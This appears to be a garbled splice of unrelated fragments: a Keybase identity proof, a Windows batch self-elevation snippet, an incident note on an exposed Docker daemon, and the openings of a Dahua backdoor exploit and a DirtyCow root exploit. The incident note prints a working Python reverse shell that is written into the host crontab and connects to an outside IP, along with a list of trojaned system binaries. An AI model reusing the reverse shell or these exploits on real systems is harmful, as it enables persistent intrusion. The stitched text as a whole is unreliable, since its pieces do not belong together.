I hereby claim:
- I am jm33-m0 on github.
- I am jm33_m0 (https://keybase.io/jm33_m0) on keybase.
- I have a public key whose fingerprint is CE45 59C1 DC1C D530 9CD5 AA93 43B6 3A9B 7369 0B57
To claim this, I am signing this object:
@echo off
:: Check privileges
net file 1>NUL 2>NUL
if not '%errorlevel%' == '0' (
powershell Start-Process -FilePath "%0" -ArgumentList "%cd%" -verb runas >NUL 2>&1
exit /b
)
:: Change directory with passed argument. Processes started with
:: "runas" start with forced C:\Windows\System32 workdir
A server with a public IPv4 address was running a Docker daemon with an unfiltered control port (2375).
From the logs, the attacker started a container based on Ubuntu.
Logs for this container only show this command:
echo -e \"* * * * * root /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"211.149.215.17\\\",1496));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);'\\n\" >> /mnt/etc/crontab
The host's /etc/crontab actually shows the command (the container had the host filesystem mounted at /mnt).
Binaries replaced:
* /bin/ps
* /bin/netstat
* /bin/ssh
New files:
#!/usr/bin/python2.7
#
# Dahua backdoor Generation 2 and 3
# Author: bashis <mcw noemail eu> March 2017
#
# Credentials: No credentials needed (Anonymous)
# Jacked from git history
#
import string
/*
 * (un)comment correct payload first (x86 or x64)!
 *
 * $ gcc cowroot.c -o cowroot -pthread
 * $ ./cowroot
 * DirtyCow root privilege escalation
 * Backing up /usr/bin/passwd.. to /tmp/bak
 * Size of binary: 57048
 * Racing, this may take a while..
 * /usr/bin/passwd overwritten